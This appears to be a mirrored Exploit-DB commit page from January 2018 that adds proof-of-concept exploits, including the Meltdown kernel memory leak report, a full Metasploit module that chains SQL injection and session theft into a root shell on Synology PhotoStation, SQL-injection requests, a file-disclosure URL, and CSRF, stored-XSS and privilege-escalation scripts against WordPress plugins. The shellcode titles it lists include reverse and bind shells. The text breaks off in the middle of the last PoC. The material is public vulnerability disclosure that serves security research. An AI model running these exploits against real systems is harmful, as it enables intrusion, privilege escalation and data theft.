bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-11

Browse source 
28 changes to exploits/shellcodes

Multiple CPUs - Information Leak Using Speculative Execution
Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check

Jungo Windriver 12.5.1 - Privilege Escalation
DiskBoss Enterprise 8.8.16 - Buffer Overflow
HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)
HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)

Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)
Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
Muviko 1.1 - SQL Injection
WordPress Plugin Events Calendar - 'event_id' SQL Injection
WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery
WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting

BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)
BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)
FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)

BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
Linux/x86 - execve /bin/dash Shellcode (30 bytes)
Alpha - /bin/sh Shellcode (80 bytes)
Alpha - execve() Shellcode (112 bytes)
Alpha - setuid() Shellcode (156 bytes)
BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
This commit is contained in:
Offensive Security 2018-01-11 05:02:24 +00:00
parent ffa8e63e25
commit a7ddd8282b
26 changed files with 2255 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

146
exploits/hardware/dos/43490.txt Normal file
View file

@ -0,0 +1,146 @@
== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and (to some extent) ARM.
I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000 bytes per second from Linux kernel memory after a
~4-second startup, in a 4GiB address space window, with the ability to
read from random offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests) from inside a KVM guest.
The attack doesn't seem to work as well on ARM - perhaps because ARM
CPUs don't perform as much speculative execution because of a
different performance-energy-tradeoff or so?
All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing tresholds.
############################################################
On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3").
So far, we have not managed to leak information this way on AMD or ARM CPUs.
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:
- If the address is not mapped (perhaps also under other
conditions?), instructions that depend on the load are not executed.
- If the address is mapped, but not sufficiently cached, the load loads zeroes.
Instructions that depend on the load are executed.
Perhaps Intel decided that in case of a sufficiently high-latency load,
it makes sense to speculate ahead with a dummy value to get a chance to
prefetch cachelines for dependent loads, or something like that?
- If the address is sufficiently cached, the load loads the data stored at the
given address, without respecting the privilege level.
Instructions that depend on the load are executed.
This is the vulnerable case.
I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:
As root, determine where the core_pattern is in the kernel:
=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====
Then, as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it) from
kernel memory, using the pointer from the previous step:
=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
|/cores/%E.%p.%s.|
ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
|%t.apport %p %s |
ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c
%P...........|
[ zeroes ]
ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
|................|
ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff |
.......u.......|
[ zeroes ]
ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
|e[..............|
ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
|....mA..........|
[ zeroes ]
real 0m13.726s
user 0m9.820s
sys 0m3.908s
=====
As you can see, the core_pattern, part of the previous core_pattern (behind the
first nullbyte) and a few kernel pointers were leaked.
To confirm whether other leaked kernel data was leaked correctly, use gdb as
root to read kernel memory:
=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
=====
Note that the PoC will report uncached bytes as zeroes.
To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.
We have not yet tested whether this still works after a TLB flush.
Regarding possible mitigations:
A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220 (cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER
Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur while for a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out, except for the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.
I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip

365
exploits/php/webapps/43474.rb Executable file
View file

@ -0,0 +1,365 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Synology PhotoStation Multiple Vulnerabilities",
'Description' => %q{
This module exploits multiple vulnerabilities in Synology PhotoStation.
When combined these issues can be leveraged to gain a remote root shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay',
],
'References' =>
[
[ 'URL', 'http://gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2018-01-08',
'DefaultTarget' => 0))
register_options(
[
OptString.new('DSMPORT', [ true, "The default DSM port", '5000']),
])
end
def check
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; SELECT user; -- "
},
})
if res and res.body =~ /PhotoStation/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
rnum = rand(1000)
rstr = Rex::Text.rand_text_alpha(10)
uuid = rnum # User ID
upwd = rstr # User Password
uusr = rstr # User name
vol1 = '/volume1'
audb = '/usr/syno/etc/private/session/current.users'
###########################################################################
# STEP 00: Force PhotoStation to NOT use DSM for the authentication system
###########################################################################
print_status("Switching authentication system to PhotoStation via SQL Injection")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; UPDATE photo_config SET config_value=0 WHERE config_key='account_system'; -- "
},
})
###########################################################################
# STEP 01: Create an admin user
###########################################################################
print_status("Creating admin user: #{uusr} => #{upwd}")
# Password hash
umd5 = Rex::Text.md5(upwd)
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; INSERT INTO photo_user (userid, username, password, admin) VALUES (#{uuid}, '#{uusr}', '#{umd5}', TRUE); -- "
},
})
###########################################################################
# STEP 02: Authenticate and store session identifier
###########################################################################
print_status("Authenticating as admin user: #{uusr}")
res = send_request_cgi(
{
'uri' => '/photo/webapi/auth.php',
'method' => 'POST',
'vars_post' =>
{
'api' =>'SYNO.PhotoStation.Auth',
'method' => 'login',
'version' =>'1',
'username' => uusr,
'password' => upwd,
'enable_syno_token' => 'TRUE',
},
})
if not res or not res.headers or not res.headers['Set-Cookie']
print_error("Unable to retrieve session identifier! Aborting ...")
return
end
uckv = res.headers['Set-Cookie']
psid = /PHPSESSID=([a-z0-9]+);/.match(uckv)[1]
print_status("Got PHP Session ID: #{psid}")
###########################################################################
# STEP 03: Delete any existing path names used from the database
###########################################################################
print_status("Making sure there are no duplicate path index conflicts ...")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; DELETE FROM video WHERE path='#{audb}'; -- "
},
})
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; DELETE FROM video WHERE path='#{vol1}/photo///current.users'; -- "
},
})
###########################################################################
# STEP 04: Create a record for our malicious path in the database
###########################################################################
print_status("Creating video record with bad 'path' data via SQL injection")
res = send_request_cgi(
{
'uri' => '/photo/include/blog/label.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'get_article_label',
'article_id' => "1; INSERT INTO video (id, path, title, container_type) VALUES (#{rnum}, '#{audb}', '#{rstr}', '#{rstr}'); -- "
},
})
###########################################################################
# STEP 05: Copy session database as root, to the web directory for reading
###########################################################################
print_status("Making a copy of the session db as root via synophotoio")
res = send_request_cgi(
{
'uri' => '/photo/include/photo/album_util.php',
'method' => 'POST',
'vars_post' =>
{
'action' =>'copy_items',
'destination' => '2f',
'video_list' => rnum
},
'cookie' => uckv
})
###########################################################################
# STEP 06: Move the session db copy to the web root for retrieval
###########################################################################
print_status("Moving session db to webroot for retrieval")
res = send_request_cgi(
{
'uri' => '/photo/include/file_upload.php',
'method' => 'POST',
'vars_get' =>
{
# /../@appstore/PhotoStation/photo/
'dir' =>'2f2e2e2f4061707073746f72652f50686f746f53746174696f6e2f70686f746f2f',
'name' => "2f",
'fname' => "#{rstr}",
'sid' => "#{psid}",
'action' => 'aviary_add',
},
'vars_post' =>
{
'url' => 'file://' + vol1 + '/photo/current.users'
},
'cookie' => uckv
})
###########################################################################
# STEP 07: Retrieve and read the session db
###########################################################################
print_status("Attempting to read session db")
res = send_request_cgi(
{
'uri' => "/photo/#{rstr}.jpg",
'method' => 'GET'
})
if not res or not res.body
print_error("Unable to retrieve session file! Aborting ...")
return
end
host = /"host": "([^"]+)"/.match(res.body)[1]
sess = /"id": "([^"]+)"/.match(res.body)[1]
syno = /"synotoken": "([^"]+)"/.match(res.body)[1]
print_status("Extracted admin session: #{sess} @ #{host}")
###########################################################################
# STEP 08: Registering files for cleanup
###########################################################################
# Uncomment for cleanup functionality
# register_files_for_cleanup("#{vol1}/photo/current.users")
# register_files_for_cleanup("#{vol1}/@appstore/PhotoStation/photo/#{rstr}.jpg")
###########################################################################
# STEP 09: Create a task containing our payload
###########################################################################
print_status("Creating privileged task to run as root")
# Switch to DSM port from here on out
datastore['RPORT'] = datastore['DSMPORT']
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'name' => '"whatevs"',
'owner' => '"root"',
'enable' => 'true',
'schedule' =>'{"date_type":0,"week_day":"0,1,2,3,4,5,6","hour":0,"minute":0,"repeat_hour":0,"repeat_min":0,"last_work_hour":0,"repeat_min_store_config":[1,5,10,15,20,30],"repeat_hour_store_config":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]}',
'extra' => '{"notify_enable":false,"script":"' + payload.encoded.gsub(/"/,'\"') + '","notify_mail":"","notify_if_error":false}',
'type' => '"script"',
'api' => 'SYNO.Core.TaskScheduler',
'method' => 'create',
'version' => '2',
},
'cookie' => "id=#{sess}"
})
if not res or not res.body
print_error("Unable to create task! Aborting ...")
return
end
task = /{"id"\d+)},"success":true}/.match(res.body)[1]
print_status("Task created successfully: ID => #{task}")
###########################################################################
# STEP 10: Execute the selected payload
###########################################################################
print_status("Running selected task as root. Get ready for shell!")
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'stop_when_error' => 'false',
'mode' => '"sequential"',
'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"run","version":1,"task":[' + task + ']}]',
'api' => 'SYNO.Entry.Request',
'method' => 'request',
'version' => '1'
},
'cookie' => "id=#{sess}"
})
###########################################################################
# STEP 11: Delete payload task from scheduler
###########################################################################
print_status("Deleting malicious task from task scheduler")
res = send_request_cgi(
{
'uri' => '/webapi/entry.cgi',
'headers' =>
{
'X-SYNO-TOKEN' => syno,
'Client-IP' => host
},
'method' => 'POST',
'vars_post' =>
{
'stop_when_error' => 'false',
'mode' => '"sequential"',
'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"delete","version":1,"task":[' + task + ']}]',
'api' => 'SYNO.Entry.Request',
'method' => 'request',
'version' => '1'
},
'cookie' => "id=#{sess}"
})
end
end

23
exploits/php/webapps/43475.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10
1. description :
unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
3. timeline
- jan 1, 2018 report vendor
- jan 1, 2018 vendor send email
- jan 1, 2018 send poc
- jan 2, 2018 vendor contact team
- jan 8, 2018 vendor send email about fixed issue
4. solution :
update to version 3.2

148
exploits/php/webapps/43477.txt Normal file
View file

@ -0,0 +1,148 @@
# Exploit Title: Muviko 1.1 - Multiple SQL Injection
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Date: 09/01/2018
# CVE: CVE-2017-17970
# Vendor Homepage: https://www.muvikoscript.com
# Version: 1.1
# Tested on: Mac OS
--------------------------------------------------------------------------------------------------------
# SQL Injection: login.php form parameter [POST] email
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
--------------------------------------------------------------------------------------------------------
# SQL Injection: load_season.php form parameter [GET] season_id
GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection get_raring.php parameter [GET] movie_id
GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection update_rating.php parameters [GET] rating,movie_id
GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close
--------------------------------------------------------------------------------------------------------
# SQL Injection set_player_source.php parameters [GET] id
GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
Connection: close

53
exploits/php/webapps/43479.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: Wichipi Events Calendar - SQL Injection
# Date: 09-01-2018
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: codecanyon.net/user/wachipi
# Version: 1.0
# CVE-ID: CVE-2018-5315
Events Calendar allows you to easily add to your website a powerful
interactive calendar to present your events.
Found 09-01-18
Vendor reply & fix 09-01-2018
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
via the event_id parameter to event.php.
NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
[Additional Information]
http://
{TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
[Vulnerability Type]
SQL Injection
[Vendor of Product]
https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
[Affected Product Code Base]
Events Calendar - 1.0
[Affected Component]
events.php
[Attack Type]
Remote
[Impact Code execution]
true
[Impact Escalation of Privileges]
true
[Impact Information Disclosure]
true
[Attack Vectors]
To exploit, union select 29 columns. User can use 2 or 25 for information
gathering.
[Discoverer]
Dennis Veninga @ Networking4all.com

74
exploits/php/webapps/43484.txt Normal file
View file

@ -0,0 +1,74 @@
* Exploit Title: Social Media Widget by Acurax [CSRF]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://www.acurax.com/
* Software Link: https://wordpress.org/plugins/acurax-social-media-widget
* Version: 3.2.5
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `acx_asmw_saveorder` which calls back the
function `acx_asmw_saveorder_callback`. The later does not implement any
anti-CSRF controls thus allowing a malicious actor to perform an attack
that could update plugin specific option `social_widget_icon_array_order`.
Vulnerable param is `$_POST['recordsArray']` and it is saved as an
option with the name `social_widget_icon_array_order`.
Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will
be served when a user with the right privileges visits plugin's settings
page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
Vulnerable code is located in file
`acurax-social-media-widget/function.php` line 993:
```
function acx_asmw_saveorder_callback() {
    global $wpdb;
    $social_widget_icon_array_order = $_POST['recordsArray'];
    if ( current_user_can( 'manage_options' ) ) {
        $social_widget_icon_array_order = serialize(
$social_widget_icon_array_order );
        update_option( 'social_widget_icon_array_order',
$social_widget_icon_array_order );
        echo "<div id='acurax_notice' align='center' style='width:
420px; font-family: arial; font-weight: normal; font-size: 22px;'>";
        echo "Social Media Icon's Order Saved";
        echo "</div><br>";
    }
    die(); // this is required to return a proper result
}
add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
```
PoC
---
In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent
XSS attack. The payload is available in plugin's settings.
```
<pre class="lang:html decode:true "><form method="post" action="http://vuln.test/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="acx_asmw_saveorder">
    <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>">
    <button type="submit" value="Submit">Submit</button>
</form>
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-12**: Tried to contact plugin's vendor through the contact
form on their website
3. **2017-12-12**: Vendor replied
4. **2017-12-12**: Vendor Received Details
5. **2018-01-02**: Patch released

109
exploits/php/webapps/43485.txt Normal file
View file

@ -0,0 +1,109 @@
* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/cms-tree-page-view
* Version: 1.4
* Tested on: WordPress 4.8.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `cms_tpv_add_page` which calls back the
function `cms_tpv_add_page`. The later does not implement any anti-CSRF
controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```
<pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="cms_tpv_add_page">
    <input type="text" name="type" value="after">
    <input type="text" name="pageID" value="1">
    <input type="text" name="post_type" value="page">
    <input type="text" name="page_title" value="<script>alert(2)</script>">
    <button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The post\_type is user defined so in the same manner we could
create any post type.
```
#!/usr/bin/env php
<?php
/*******************************************************************************
 * CMS Tree Page View [Privilege Escalation]
 *
 * To install deps run `composer require wordfence/exkit`.
 *
 * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
 * @date 2017-08-09
 ******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
Cli::writeInfo( 'Sending payload...' );
$postData = [
    'action'      => 'cms_tpv_add_page',
    'type'        => 'after',
    'pageID'      => '1',
    'post_type'   => 'page',
    'page_title' => date('Y-m-d H:i:s'),
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || $r->body == '0'){
    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-23**: Vendor notified by email
3. **2018-01-06**: Patch released

117
exploits/php/webapps/43486.txt Normal file
View file

@ -0,0 +1,117 @@
* Exploit Title: Admin Menu Tree Page View [CSRF, Privilege Escalation]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://eskapism.se/
* Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view
* Version: 2.6.9
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements AJAX action `admin_menu_tree_page_view_add_page` which
calls back the function `admin_menu_tree_page_view_add_page`. The later
does not implement any anti-CSRF controls or security checks.
Leveraging a CSRF attack an attacker could perform a Persistent XSS
attack if the victim has administrative rights (see PoC).
The AJAX action is a privileged one so it's only available for
registered users. Even so it doesn't implement any capabilities checks
so it's available to all users no matter the access level. This could
allow any registered user to create arbitrary posts no matter the access
level.
PoC
---
### CSRF -> Persistent XSS
In this PoC we exploit the `$_POST["page_titles"]` param to perform a
Persistent XSS attack.
```
<pre class="lang:html decode:true "><form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="admin_menu_tree_page_view_add_page">
    <input type="text" name="type" value="after">
    <input type="text" name="pageID" value="1">
    <input type="text" name="post_type" value="page">
    <input type="text" name="page_titles[]" value="<script>alert(1)</script>">
    <input type="text" name="post_status" value="publish">
    <button type="submit" value="Submit">Submit</button>
</form>
```
### Create Arbitrary Posts
In this PoC we use a user with subscriber access to create arbitrary
pages. The post\_type is user defined so in the same manner we could
create any post type.
```
#!/usr/bin/env php
<?php
/*******************************************************************************
 * Admin Menu Tree Page View [Privilege Escalation]
 *
 * To install deps run `composer require wordfence/exkit`.
 *
 * @author Panagiotis Vagenas <pan.vagenas@gmail.com>
 * @date 2017-08-09
 ******************************************************************************/
require_once __DIR__ . '/vendor/autoload.php';
use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\WPAuthentication;
Config::get( 'url.base', null, true, 'Enter the site URL' )
|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
$s->XDebugOn();
Cli::writeInfo( 'Logging in as subscriber...' );
WPAuthentication::logInAsUserRole( $s,
WPAuthentication::USER_ROLE_SUBSCRIBER );
Cli::writeInfo( 'Sending payload...' );
$postData = [
    'action'      => 'admin_menu_tree_page_view_add_page',
    'type'        => 'after',
    'pageID'      => '1',
    'post_type'   => 'page',
    'page_titles' => [ '<script>alert(1)</script>' ],
    'post_status' => 'publish',
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || !$r->body == '0'){
    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-12**: Tried to contact plugin author through WordPress.org
support threads
3. **2017-12-13**: Tried to contact plugin author by creating an issue
in plugin's repository on Github
4. **2017-12-13**: Vendor replied
5. **2017-12-14**: Vendor received details
6. **2018-01-07**: Patch released

57
exploits/php/webapps/43487.txt Normal file
View file

@ -0,0 +1,57 @@
* Exploit Title: WordPress Download Manager [CSRF]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: https://www.wpdownloadmanager.com/
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.60
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
Plugin implements the AJAX action `wpdm-install-addon` which calls the
function `wpdm_install_addon`. This function doesn't take any anti-CSRF
measures thus making it susceptible to those kind of attacks.
What is interesting about this function though, is the fact that it
provides plugin installation functionality for admin users. The origin of
the package is defined by the `$_REQUEST['addon']` if is set without any
validation.
A malicious actor can exploit this to install a malicious plugin in the
vulnerable site. In fact the install package doesn't need to be a valid
plugin, it could just contain malicious code. Because the package is
extracted in the `/wp-content/plugins/` dir without changing it's original
folder structure, an attacker could leverage the CSRF to upload malicious
code and execute the code on the infected server.
PoC
---
```
<pre class="lang:html decode:true "><form method="post" action="http://vuln.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpdm-install-addon">
<label> This is the remote url to get plugin from. Everything is valid as long as it's a ZIP archive and ends with .zip
